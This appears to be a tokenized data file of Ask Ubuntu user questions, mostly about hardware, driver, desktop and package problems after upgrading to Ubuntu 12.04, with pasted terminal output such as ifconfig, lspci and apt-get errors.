128336	wireless not working anymore on acer aspire 6930g when i upgraded to 12.04	i have been using ubuntu for a long time and i have never encountered any driver related issues . however after i upgraded my ubuntu to the latest version ubuntu 12.04 lts , wireless is not working anymore . my machine is acer aspire 6930g . the output of ifconfig : eth0 link encap : ethernet hwaddr 00:23:8b : ab : ca:75 inet addr:192.168.1.37 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :223:8bff : feab : ca75/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:22966 errors:0 dropped:0 overruns:0 frame:0 tx packets:20439 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 rx bytes:23522506 ( 23.5 mb ) tx bytes:3213803 ( 3.2 mb ) interrupt:47 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2365 errors:0 dropped:0 overruns:0 frame:0 tx packets:2365 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:385015 ( 385.0 kb ) tx bytes:385015 ( 385.0 kb ) wlan0 link encap : ethernet hwaddr 00:22 : fa:1a:6c : a8 inet addr:192.168.1.35 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :222 : faff : fe1a:6ca8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:208 errors:0 dropped:0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:32326 ( 32.3 kb ) tx bytes:12005 ( 12.0 kb )
128339	is it possible to use mint4win and wubi at the same time ?	a year or two ago , i installed mint4win on a windows 7 netbook , and have used it frequently since , with no issues ( even once when i had to cold reboot ! ) . i enjoy using linux mint , but after trying ubuntu 12.04 from a usb stick , i 'd like to be able to install that , too . the problem is that i share the windows 7 netbook with my family , and i have to be careful not to mess up windows , which is why i went the mint4win route in the first place . so , here 's the question : is it possible to install precise using wubi while still keeping mint , using mint4win ?
128345	logitech m515 does not work after upgrade to 12.04	after upgrading to 12.04 , my logitech m515 does not work here is some output from the terminal : lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0411:002a buffalo inc. ( formerly melco. , inc. ) bus 001 device 004 : id 055d:3021 samsung electro-mechanics co . bus 002 device 002 : id 413c:2005 dell computer corp. rt7d50 keyboard bus 004 device 002 : id 0582:0074 roland corp. edirol ua-25 bus 005 device 002 : id 046d : c52b logitech , inc. unifying receiver dmesg | grep logitech [ 30.470528 ] logitech-djreceiver 0003:046d : c52b.0004 : hiddev0 , hidraw1 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1d.3-2/input2 the cursor does not move . also the mouse was working in 11.10 and is working in windows nt 5.1.2600 .
128347	battery time decreased on an hp probook 4530s	i have hp probook 4530s . in windows 7 after installing all hp drivers the 6-cell battery works perfectly for 2+ hours but in ubuntu 11.10 and now in 12.04 the battery time is not sufficient . it works hardly for 1 or 1.5 hours only . i have installed ati 's linux driver for the radeon card . i have noticed that in windows only 4 processor core are active most of the time and remaining are put in off-line mode until required . however in ubuntu all 8 processors cores remain active . powertop shows a battery discharge of 25 w up to 28 w. how can i tune-up the power management especially make unnecessary active processor off-line ?
128359	keyboard shortcuts no longer working on gnome 3.4.1	i upgraded from ubuntu 11.10 ( with gnome 3.2 i think ) , to ubuntu 12.04 with gnome 3.4.1 , and my custom shortcuts have stopped working . opening up the all settings - > keyboard - > shortcuts , i can see that my shortcuts are still there . all of the shortcuts that i did n't change are working , and my shortcuts in the custom section are working ( eg ctrl+alt+g to open gedit ) , its just that the shortcuts i had customised before the upgrade no longer work . under launchers , i had changed `` launch terminal '' to ctrl+alt+t , and under navigation i had changed move to workspace above/below to shift+ctrl+up/down . investigating further , it looks like the default shortcuts for these actions work ( ctrl+alt+up/ down moves me up and down workspaces ) , so i 'm guessing that there is some discrepancy between what i am seeing on the keyboard settings and what my computer is reading from . any help would be appreciated .
128367	after update to 12.04 lts 64bit i got an update that i can not install : `` multi-arch versions of former ia32-libraries ''	since i updated my system , this update is shown , but can not be selected . i guess , because it does not fit to my 64bit system . but : since it is there , i always got the information that update ( s ) are available - which is really not the case . how can i get rid of this ?
128369	'sudo apt-get update ' error on ubuntu 12.04	when i type in sudo apt-get update i get this : mohd-arafat-hossain @ tud : ~ $ sudo apt-get update [ sudo ] password for mohd-arafat-hossain : ign http : //bd.archive.ubuntu.com precise inrelease ign http : //bd.archive.ubuntu.com precise-updates inrelease ign http : //bd.archive.ubuntu.com precise-backports inrelease ign http : //bd.archive.ubuntu.com precise release.gpg ign http : //bd.archive.ubuntu.com precise-updates release.gpg ign http : //bd.archive.ubuntu.com precise-backports release.gpg ign http : //bd.archive.ubuntu.com precise release ign http : //bd.archive.ubuntu.com precise-updates release ign http : //bd.archive.ubuntu.com precise-backports release ign http : //extras.ubuntu.com precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //extras.ubuntu.com precise/main sources hit http : //bd.archive.ubuntu.com precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //bd.archive.ubuntu.com precise/multiverse translationindex hit http : //bd.archive.ubuntu.com precise/restricted translationindex hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //bd.archive.ubuntu.com precise/universe translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //security.ubuntu.com precise-security inrelease hit http : //security.ubuntu.com precise-security release.gpg hit http : //bd.archive.ubuntu.com precise-updates/main translationindex hit http : //security.ubuntu.com precise-security release hit http : //bd.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //bd.archive.ubuntu.com precise-updates/restricted translationindex hit http : //bd.archive.ubuntu.com precise-updates/universe translationindex hit http : //security.ubuntu.com precise-security/main sources ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en hit http : //bd.archive.ubuntu.com precise-backports/main translationindex hit http : //bd.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //bd.archive.ubuntu.com precise-backports/restricted translationindex ign http : //ppa.launchpad.net precise/main translation-en hit http : //bd.archive.ubuntu.com precise-backports/universe translationindex hit http : //bd.archive.ubuntu.com precise/main translation-en hit http : //bd.archive.ubuntu.com precise/multiverse translation-en hit http : //bd.archive.ubuntu.com precise/restricted translation-en hit http : //bd.archive.ubuntu.com precise/universe translation-en hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //bd.archive.ubuntu.com precise-updates/main translation-en hit http : //bd.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //bd.archive.ubuntu.com precise-updates/restricted translation-en hit http : //bd.archive.ubuntu.com precise-updates/universe translation-en hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //bd.archive.ubuntu.com precise-backports/main translation-en hit http : //bd.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //bd.archive.ubuntu.com precise-backports/restricted translation-en hit http : //bd.archive.ubuntu.com precise-backports/universe translation-en err http : //bd.archive.ubuntu.com precise/main sources 404 not found err http : //bd.archive.ubuntu.com precise/restricted sources 404 not found err http : //bd.archive.ubuntu.com precise/universe sources 404 not found err http : //bd.archive.ubuntu.com precise/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise/multiverse i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/main sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/restricted sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/universe sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise-updates/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-updates/multiverse i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/main sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/restricted sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/universe sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/multiverse sources 404 not found err http : //bd.archive.ubuntu.com precise-backports/main i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/restricted i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/universe i386 packages 404 not found err http : //bd.archive.ubuntu.com precise-backports/multiverse i386 packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages 404 not found w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how do solve this issue and not get this error. ? please
128370	difference between purge and dpkg -p ?	i am still a bit new to linux . i had to uninstall phpmyadmin from the production server and googled for it and used this : sudo dpkg -p phpmyadmin well , this worked fine , but it seems everyone else on ubuntu is using a purge instead sudo apt-get purge phpmyadmin have i done anything wrong ? any consequences i should be aware of ( it is my production server after all ) are all bits of the phpmyadmin really uninstalled through dpkg -p ? many thanks ,
128375	low graphics mode after upgrade to 12.04	i have an ati radeon 3200 graphics card . i just upgraded to 12.04 and i get the system running low graphics ... error code . your screen , graphics card , and input device settings could not be detected correctly . it is exactly the same problem as one or two previous questions . so i tried their solutions to run sudo apt-get install ubuntu-desktop and sudo apt-get install fglrx the only answer i get is you allready have the latest sw. and my problem with system running low graphics ... is still there . so what do i do ? for the time being i run the previous version . it worked perfectly . gunnar
128376	emacs ignores .xresources	i have some settings in .xresources for emacs . namely : emacs.font : monospace-10 : antialias=true : pixelsize=14 emacs.menubar : off emacs.toolbar : off emacs.verticalscrollbars : off this worked fine on 11.10 . but in 12.04 , the toolbars are back ! noooo ! what 's going on ? i tried moving the settings to .xdefaults but that did n't work . i tried changing emacs to emacs23 as i saw suggested somewhere . nothing seems to help .
128393	how do i mount an active directory windows share ?	how can i mount active directory windows share in ubuntu 12.04 ? in 10.04 it was easy mounting a windows server share i nautilus , but it keeps telling me that my credentials is wrong . and they are not !
128396	how can i tell if a machine has pae ?	i want to help someone upgrade an oldish laptop from 11.10 to 12.04 , which requires pae . i am not sure whether they have pae or not . i know it is likely that they do have it after all , but how can i tell before trying to upgrade ?
128399	upgrade to 12.04 does not boot	i have upgraded to 12.04 via upgrade mamager . i can not get the image to boot ( blank screen ) after the grub menu . grub seems ok . i can get the previous unix version to run in recovery mode ( rahter shaky ) . booting 12.04 in recovery mode displayes very early the message firewire_ohci : failed to set link power status there is no firewire installed on this acer travelmate 8210 to my knowledge ... . is it possible to disable firewire for booting ? is it possible to downgrade again to the previosu version of ubuntu ? any help appreciated !
128401	vga problem in ubuntu 12.4 dell n5110	i just upgraded from 11.10 to 12.4 , now my intel hd and nvidia 525 graphic cards is not installed and in additional hardware it cant find them ... any solution ? ? ? by the way i used bumblebee to reach more power on my laptop .
128402	how does ubuntu know my native language ?	i downloaded ubuntu iso and done a clean install.upon booting it shows everything in my native language , malayalam ( language for kerala state , india ) .i really wondered thinking how it happened.during installation i selected english as my default language.but how it knows i am from kerala ? ubuntu is funny ! ! ! i love it !
128404	xfce 4.10 package availability	xfce 4.10 has recently been released but i can not find a supported ppa available yet . there is this ppa https : //launchpad.net/~xubuntu-dev/+archive/xfce-4.10 but it still remains empty . does anyone have any news on when/where an official ubuntu build will be released ?
128409	how can i make oracle virtualbox appear in 12.04 dash ?	after upgrading to 12.04 i discovered i had the ose version of virtualbox , rather than the oracle version previously installed . i had to reinstall virtualbox it to get it working . then , i re-enabled the oracle repo and intalled virtualbox-1.4 . however , while the ose version came up in the dash , the oracle version does n't . it did when running under 11.10 . is this a bug ? how can i make it appear in the dash ?
128411	new windows in session fallback	i 've just installed ubuntu 12.04 ( 64 bit ) . i hate unity , so i use gnome-session-fallback . everything works fine ( ok , not as well as it worked in gnome2 ... ) but if i open a new window , it always appears in the top-left corner corner and its menu bar is behind my top menu bar ( with application menu , places , etc. ) . how can i fix it ? it annoys me a lot . please help !
128413	setting the path so it applies to all users , including root/sudo	the instructions in how do i set path variables for all users on a server ? work to set the path for all 'normal ' users . however , if i do sudo -s and then printenv path the updated path is not shown . i 've taken a look at for example setting tex live path for root , but this does not seem to make sense to me , perhaps as i 'm from a windows background . is there any way to set the truly system-wide path , such that the entries are inherited by absolutely every process running on the system ?
128416	can not upgrade or install 12.04 - black screen	an update from 11.10 to 12.04 failed because of a boot into black screen ( nvidia graphics card ) after selecting normal boot in grub ( recovery console was available though ) . i then wiped the whole partition ( deleting all proprietary drivers ) and tried a fresh install , but could not run the installation cd because it was booting straight into a black screen again . now i reinstalled 11.10 ( and installed proprietary nvidia driver version 173 ) , and would like to ask 2 questions : 1 - is there a proven method to fix this problem from the recovery console , so that i can safely try upgrading again ( without much knowledge of ubuntu ) ? 2 - is there a website which i could check for updated nvidia drivers packaged into the upgrade , so that i can safely upgrade without running into a black screen some time later on ?
128417	low graphics mode error on startup with nvidia graphics ( 12.04 lts )	my problem is similar to two other posts concerning ati cards and 12.04 lts : post1 & post2 . in my case i use a dell precision m4300 laptop which uses a nvidia quadro fx 880m . doing a lspci | grep vga gave me this : 01:00.0 vga compatible controller : nvidia corporation gt216 [ quadro fx 880m ] ( rev a2 ) my workaround consists of logging in at the console and running sudo start lightdm which works perfectly but i am looking for a better workaround than this ?
128422	why ca n't other machines connect to my ad-hoc wireless network ?	i created ad hoc network in network manager . and set static ip address . when i am going to connect with other pc , its not connecting with that . i followed this link enter link description here right-mouse click the networkmanager icon ( top right ) select `` edit connections '' click the `` wireless '' tab click `` add '' to edit a new wireless connection on the wireless dialogue give the connection a name , e.g `` mochudi '' . * ssid : `` mochudi '' . the ssid will appear on the networkmanager of your other peers mode : ad hoc * bssid : leave blank * mac address : leave blank * mtu : leave as automatic click `` apply '' click `` close '' if fixed ip addresses are required edit the ipv4 settings tab before closing networkmanager above : ... as above then ... 6a . click `` ipv4 settings tab '' * select method `` manual '' * under addresses click add * type your address : 10.42.43.1 * type the netmask : 255.255.255.0 * gateway : leave blank or 0.0.0.0 6b . click `` apply '' click `` close ''
128427	hibernate was working on 11.10 and is not anymore on 12.04	i have a thinkpad t400s which was using ubuntu 11.10 until yesterday . i never shut down the system and was using hibernate constantly and without problems . after upgrading to 12.04 i was surprised not to find hibernate in the power menu anymore . a quick search showed me how to enable it again , but the bad news is that it does not work anymore . meaning that it does not come back after the hibernation : i get to the screen with the ubuntu logo and the five white dots under it which turn red one after the other . the screen then freezes before the last one turns red . it can not be a question of new hardware or problematic old hardware because hibernate was working before . if anybody can help , this would be much appreciated .
128429	how do i make an application autorun at login for all users ?	how do i make an application autorun at login for all users ? im trying to have conky autorun for all users . i 'm running ubuntu 12.04 64bit . any help would be greatly appreciated .
128430	how do i create a launcher for the xampp control panel ?	i 've just installed ubuntu 12.04 on my dell v1450 laptop . i downloaded and installed xampp 1.7.7 after that i created xampp control panel by using this command : gedit ~/.local/share/applications/xampp-control-panel.desktop file content : [ desktop entry ] comment=start/stop xampp name=xampp control panel exec=gksudo âpython /opt/lampp/share/xampp-control-panel/xampp-control-panel.pyâ icon [ en_ca ] =/usr/share/icons/tango/scalable/devices/network-wired.svg encoding=utf-8 terminal=false name [ en_ca ] =xampp control panel comment [ en_ca ] =start/stop xampp type=application icon=/usr/share/icons/tango/scalable/devices/network-wired.svg the file has `` execute '' permission already . i tried to launch the launcher in dash home but nothing appeared after typing my password . what did i wrong here ?
128431	`` bootmanager is missing '' error when trying to dual boot	trying to use 11.10 boot manager to load windows 7 . i get the message that bootmanager is missing ( for win 7 i suppose ) . both os on same sda : u on sda7 , win on sda2 . win was installed first , then u was added . i can see the win7 load line while booting , but immediately after choosing win7 i get the message of non bootmngr for the win area . how do i add bootmanager so can win 7 can b used ? i have the correct sda2 uuid of cause .
128433	how to prevent nvidia kernel module from loading ubuntu 12.04 64 bit	i have a nvidia optimus laptop with ubuntu 11.10 and previous i used to blacklist nouveau ( by `` sudo gedit /etc/modprobe.d/blacklist.conf '' and adding `` blacklist nouveau '' then executing `` sudo update-initramfs -u '' ) so the built in intel graphic was used , it work with unity 3d . now i have installed ubuntu 12.04 64bit tried to blacklist nouveau nvidia nvidiafb nv and updating ramfs but lsmod still showes that the nvidia module was loaded . how do i prevent this ?
128441	how to get ubuntu 12.04 ( 64bit ) + eclipse 3.7.2 + adt 18 working ?	as the question already says , on a fresh installation of ubuntu 12.04 64 bit environment , after installing sun jdk 6 successfully with a little bit of trouble , i installed eclipse 3.7.2 from the software center . opened eclipse , help > install new software . added the update site provided by google for android development . it downloaded and installed and asked to restart as it would for any plugin installation . did so , restarted eclipse and it does n't show anything from adt . it almost seems like its not even installed , but when i checked the plugins installed in help > '' about eclipse '' section , it shows up . any idea how to solve this issue ? is it got anything to do with the global menu integration issue where previously menuproxy was used to solve it ?
128457	how to install an application like gimp from terminal and install all the available plugins showed in software center ?	what i want is to run from terminal sudo apt-get install gimp but also install all the available plugins ! so , i tried this sudo apt-get install gimp* but this installed all the packages with name gimpblablabla . so which is the right way to do this ? thanks edit -- -- > so , from software center i am installing gimp and check all the boxes for what i want ! the alternative to it from terminal is sudo apt-get install gimp gimp-plugin-registry gimp-cbmplugs extremetuxracer-gimp-dev ? no right ? well , that question was not only for gimp but for other applications too ! so , i want this for a deeper knowledge of installing from terminal ! if i want to list for example the available plugins for gimp what is the way ? i hope it is not so confusing ! thanks very much for your answers !
128459	where is the power button setting on 12.04 ?	i upgraded my system to 12.04 and i 'm quite pleased so far . when i hit the power button on my laptop the system hybernates . there was once a menu where i could change this setting ( e.g . to lock screen or ask if shutdown ) . where is it now ?
128463	how to control brightness	i did n't install anything myself , but only ubuntu 12.04 lts on an acer 4741g . i use fn+left/right to change the brightness , but failed . how can i control the brightness levels ?
128470	weird youtube player colours - channels swapped	i am having an issue in my ubuntu 11.10 , with youtube colours being messed up - it looks as though channels have been muddled like rgb - > bgr or something . how can i fix it ? edit : it does not happen in html5 version , only in flash player . however , some youtube videos can not be watched in html5 ( e.g . ones with ads ) , so it is still a problem often
128474	how to customize on screen notifications ?	there was a tool to configure notifications in earlier versions of ubuntu as described here . i tried to install it in ubuntu 12.04 too but i failed . i want to have the notifications dynamically located ( e.g . notifications for music player and volume control will be shown at the same place ) and to reduce the notification duration . how do i change settings of notifications ?
128475	unity launcher refuses to open properly	i have just fresh installed 12.04 , there were a handful of packages that were upgraded right away ( 12 or so ) . aside from that i have n't tweaked or installed anything else . i have gone into my system settings - > appearance - > behavior tab and turned on auto-hide the launcher . at this point placing my mouse cursor to the far left edge of the screen should open my launcher . here is a short video showing you what is happening . http : //www.youtube.com/watch ? v=shmsejt61am i have tried setting the reveal sensitivity all the way to low , and all the way to high and it still appears the same for me . you will also notice in the video that there is a small dropshadow that appears on the edge of the screen when ( imo ) the sidebar should appear . is there a configuration i am missing ? does reveal sensitivity not do what i would assume it does ? any help would be appreciated .
128481	how do i set xscreensaver to autostart ?	i 've just installed xscreensaver instead of gnome-screensaver in ubuntu 12.04 in gnome-session-fallback ( gnome classic ) mode . it works fine , but i have a problem : i put `` xscreensaver -no-splash '' command to the startup applications list . but it does n't start automatically , i have to run this command manually . i think that the problem is that it tries to start before i log in . so how can i start it automatically after login ?
128487	the installer encountered an error copying files to the hard disk	the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . please suggest me as i deleted the previous version 11.10 ... so my installation 12.04 is stuck i am using the live usb .
128488	how do i install synce ?	i was trying to install synce on ubuntu 11.10 . it is used to sync windows mobile phones 5/6 using activesync . so far i have managed to setup a a connection between the computer and my windows phone. ( i.e . i see files and folders when i type synce-pls ) . however when i come to the actual syncing to evolution this tells me to install `` multisync-tools opensync-plugin-synce synce-sync-engine '' , however i can not find the first two in the repositories .
128492	is there a way to `tar` extract without clobbering	is there a way to tar extract without clobbering ? i am installing 12.04 and want to restore my data from 10.10 . anything 12.04 specific i would like to keep , that is i do not want the tar 'd 10.10 version to be extracted . if i do a general restore such files as .bashrc will be clobbered . is there a way to avoid this ? edit : i would note that a booted 12.04 iso disk image allows an upgrade from 10.10 ( or whatever ) and it offers to keep old data . i tried this but it complained some applications might be left broken after the upgrade . i decided to just reboot and do a clean install .
128494	how do i permanently lock ms office apps ( installed using wine ) to the launcher in unity ?	i 'm currently migrating a computer from ubuntu 10.04 to 12.04 & they require ( unfortunately ) microsoft office 2007 with word , excel & powerpoint . installation through wine works perfectly fine & i can search through the dash to either launch the application or drag & drop the icon into the launcher . this issue is , if i log out or reboot the computer the icons disappear from the launcher . i 've confirmed that the icon is locked into the launcher . am i doing something wrong or is there an easy way to keep the icons in the launcher ? i could use the dash to search for it but prefer to lock it in the launcher . in 10.04 i was able to add it to the top panel .
128497	how to install google docs lens on ubuntu 12.04	today i am trying to install the google docs lens on ubuntu 12.04 but it do not work : ( the terminal just says : $ sudo apt-get install unity-lens-gdocs reading package lists ... done building dependency tree reading state information ... done e : unable to locate package unity-lens-gdocs
128501	smart disk failure 05 - reallocated sector count : creating a partition ubuntu 12.04	i apologize if this question has been answered previously . i 've checked through the `` similar titles '' but have n't exactly had any luck . i 'm aware of the problem and i know the solution , i simply do n't know how to implement the solution properly . any help would be greatly appreciated . what i 'm experiencing is a smart failure 05 and i 'm being warned that a disk failure is imminent . my old partitions is what is causing the problem and the solution is to skip over the bad sectors via a new partition . i have a 100gb hard drive , and i think it 's safe to say that the first 20gb are borked in this regard . how do i set up a partition outside of these first 20gb ? would i designate this as `` free space '' ? or something else ? please be detailed ( e.g . screen shots ) , i 'm fairly computer literate but i 'm a beginner when it comes to ubuntu 12.04 . thank you for your help !
128503	wireless shuts on and off every few minutes with an atheros ar9285	the wireless on my acer iconia tab w500 running ubuntu 12.04 shuts on and off every few minutes . this affects all other devices on my wireless network , including a windows 7 pc , macbook , and ipod touch . when i have ubuntu turned off the network works normally . i had ubuntu 11 running on it before with the same issue and i hoped the upgrade would solve it , but it has n't . when i go to the library or a coffee shop the internet works great and does n't shut off . i 'm really liking ubuntu on my acer tab and hope i do n't have to go back to windows , but this is a pretty crazy issue ! please help if you can or point me to a similar thread . i 'm a designer and not a programmer so child talk is helpful . thanks so much . i ran a few tests in the terminal that might help someone smarter than me : 1. sudo lshw -class network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : e4 : d5:3d:94 : f8:05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-24-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:90000000-9000ffff *-network description : ethernet interface physical id : 1 logical name : eth0 serial : e8:40 : f2:31 : c3:33 size : 10mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=08- nov-2011 duplex=half firmware=asix ax88772 usb 2.0 ethernet link=no multicast=yes port=mii speed=10mbit/s 2. lspci 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6290 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:05.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:16.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 3. rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : no hard blocked : no 3 : acer-bluetooth : bluetooth soft blocked : yes hard blocked : no 12 : hci0 : bluetooth soft blocked : yes hard blocked : no let me know whatever else you need and thanks !
128513	mouse and keyboard does not work after upgrade to 12.04	i upgraded to 12.04 today and after the reboot the mouse and keyboard ( usb ) does not work at all , not even num lock . i have tried to reboot hard and switch usb ports . do you have any suggestions ?
